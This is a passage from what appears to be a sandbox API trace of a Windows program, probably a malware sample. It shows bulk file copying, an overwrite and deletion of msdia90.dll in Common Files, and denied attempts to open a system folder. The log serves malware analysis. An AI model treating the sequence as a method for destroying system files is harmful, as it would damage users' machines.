lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.628] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.628] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.628] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.628] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.629] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.629] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.629] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.629] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.629] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.629] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.629] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.630] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.630] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.630] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.630] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.630] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.630] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.630] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.630] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.631] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.631] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.631] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.631] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.631] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.631] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.632] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.632] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.632] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.632] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.633] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.633] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.633] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.633] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.633] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.633] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.633] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.633] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.634] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.634] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.634] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.634] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.634] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.634] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.634] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.634] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.634] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.635] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.635] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.635] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.635] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.635] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.635] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.635] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.636] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0xd50, lpOverlapped=0x0) returned 1 [0103.636] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.636] ReadFile (in: hFile=0x27c, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0103.636] WriteFile (in: hFile=0x368, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327ef70*=0xd50, lpOverlapped=0x0) returned 1 [0103.636] CloseHandle (hObject=0x368) returned 1 [0103.636] CloseHandle (hObject=0x27c) returned 1 [0103.637] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.644] GetFileType (hFile=0x27c) returned 0x1 [0103.644] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0103.644] WriteFile (in: hFile=0x27c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0103.645] CloseHandle (hObject=0x27c) returned 1 [0103.645] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia90.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia90.dll")) returned 1 [0103.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0103.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0103.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x570e0 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0103.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.647] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.647] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4a3, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="\x02", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧蒐\x07̧비聐虘\x08賂̧")) returned 0 [0103.647] FindClose (in: hFindFile=0x78490 | out: hFindFile=0x78490) returned 1 [0103.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0103.647] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0103.647] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0103.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0103.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0103.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0103.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0103.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0103.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0103.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0103.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8afe0 [0103.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0103.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0103.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0103.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.648] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0103.648] AreFileApisANSI () returned 1 [0103.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX", lpUsedDefaultChar=0x0) returned 51 [0103.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0103.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.648] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0103.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0103.648] AreFileApisANSI () returned 1 [0103.648] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0103.648] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x460b8 [0103.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX") returned 51 [0103.649] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.649] GetLastError () returned 0x5 [0103.649] GetLastError () returned 0x5 [0103.649] SetLastError (dwErrCode=0x5) [0103.649] GetLastError () returned 0x5 [0103.649] SetLastError (dwErrCode=0x5) [0103.649] GetLastError () returned 0x5 [0103.649] SetLastError (dwErrCode=0x5) [0103.649] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0103.649] AreFileApisANSI () returned 1 [0103.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0103.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46358 [0103.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VGX") returned 51 [0103.649] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VGX" (normalized: "c:\\program files\\common files\\microsoft shared\\vgx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0103.649] GetLastError () returned 0x5 [0103.649] GetLastError () returned 0x5 [0103.649] SetLastError (dwErrCode=0x5) [0103.649] GetLastError () returned 0x5 [0103.649] SetLastError (dwErrCode=0x5) [0103.649] GetLastError () returned 0x5 [0103.649] SetLastError (dwErrCode=0x5) [0103.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0103.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0103.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0103.650] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, 